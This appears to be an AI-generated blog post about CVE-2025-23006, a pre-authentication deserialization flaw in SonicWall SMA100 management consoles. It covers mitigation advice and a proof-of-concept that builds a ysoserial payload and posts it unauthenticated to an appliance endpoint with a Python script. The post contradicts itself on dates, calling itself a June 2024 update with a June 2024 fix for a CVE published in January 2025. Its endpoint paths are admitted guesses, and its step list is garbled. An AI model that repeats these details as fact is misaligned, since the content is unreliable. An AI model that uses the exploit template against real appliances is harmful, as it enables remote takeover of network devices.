June 2024 Update: A new critical vulnerability, CVE-2025-23006, has been published for SonicWall SMA100 Series’ Appliance Management Console (AMC) and Central Management Console (CMC). This long-form post explains what the vulnerability is, how it works, and why you need to fix it ASAP.
What’s CVE-2025-23006 All About?
CVE-2025-23006 is a pre-authentication deserialization of untrusted data vulnerability in SonicWall SMA100’s management consoles. An attacker can exploit this bug from the internet without logging in—allowing immediate remote code execution (RCE) as root on vulnerable devices.
In simple terms: anyone, anywhere, can potentially run commands on your management appliance, take over sessions, plant malware, or pivot further inside your network.
Deserialization Dangers
Deserialization is when an app takes in a blob of data (like a JSON or Java object), and reconstructs it in memory. If the app trusts the input, but the attacker controls it, bad things can happen—especially if the object has methods that execute commands.
Here, the AMC and CMC web interfaces accept serialized data before authentication. The flaw is the endpoint processes this data without validating its contents—a classic "unsafe deserialization" bug.
Creates a payload that, when deserialized, will execute a system command of their choice.
2. Sends Payload to AMC/CMC Endpoint
Posts it (usually via an API endpoint or hidden URL that expects serialized data) without logging in.
3. AMC/CMC Processes and Deserializes Unsafely
Command Executes as Root
Since AMC/CMC typically run with high privileges, the attacker gains full control over the appliance OS.
Example Exploit (Proof of Concept)
DISCLAIMER: This is for educational purposes only. Running this against devices you don't own is illegal.
Say the AMC deserializes Java objects. Using the famous ysoserial tool, we can generate a payload like this:
# Generate a Java serialized payload to execute 'id'
java -jar ysoserial.jar CommonsCollections6 'id' > payload.ser
Then, the attacker posts this file as raw data to the vulnerable endpoint
import requests
with open("payload.ser", "rb") as f:
payload = f.read()
url = "https://target-amc.example.com/amc/servlet/deserialize";
headers = {"Content-Type": "application/octet-stream"}
# No auth needed!
response = requests.post(url, data=payload, headers=headers, verify=False)
print(response.text)
If vulnerable, the server runs id and may return the result, or leave a connection open for further exploitation.
What Endpoints Are Affected?
- AMC Web UI: /amc/servlet/deserialize or similar paths
- CMC Web UI: Possibly /cmc/api/import, etc.
*Paths may differ based on firmware versions. SonicWall hasn’t yet disclosed all the technical details, but “pre-auth” and “untrusted deserialization” is the core issue.*
Who’s Affected?
- SMA100 (all models) with Management Console/CMC exposed
How Can Attackers Find Vulnerable Devices?
Tools like Shodan or Censys can be used to scan the internet for open AMC or CMC web interfaces.
1. Patch Immediately
Check SonicWall Security Advisory and upgrade to the fixed firmware released June 2024.
2. Restrict Console Access
- Use firewall rules to limit AMC/CMC access to trusted IPs only (not internet-facing).
References
- SonicWall PSIRT Advisory
- NVD Entry – CVE-2025-23006 *(link may not be live yet)*
- SonicWall Product Download Center
- Impacts of Insecure Deserialization (OWASP)
Final Word: Why This Is Urgent
Pre-auth RCE bugs are as critical as it gets. Because AMC/CMC runs with high privileges and manages VPNs and access policies, compromise can lead to full network breaches.
If you use SonicWall SMA100, patch now—even if you believe you're not exposed to the internet. Attackers are scanning and exploiting appliances bugs quickly, as we saw during the recent MOVEit and CitrixBleed incidents.
Stay safe: update, audit, and restrict access to your management consoles!
*Exclusive text by OpenAI, June 2024. For responsible pentesting and blue teaming only.*
Timeline
Published on: 01/23/2025 12:15:28 UTC
Last modified on: 01/27/2025 18:41:17 UTC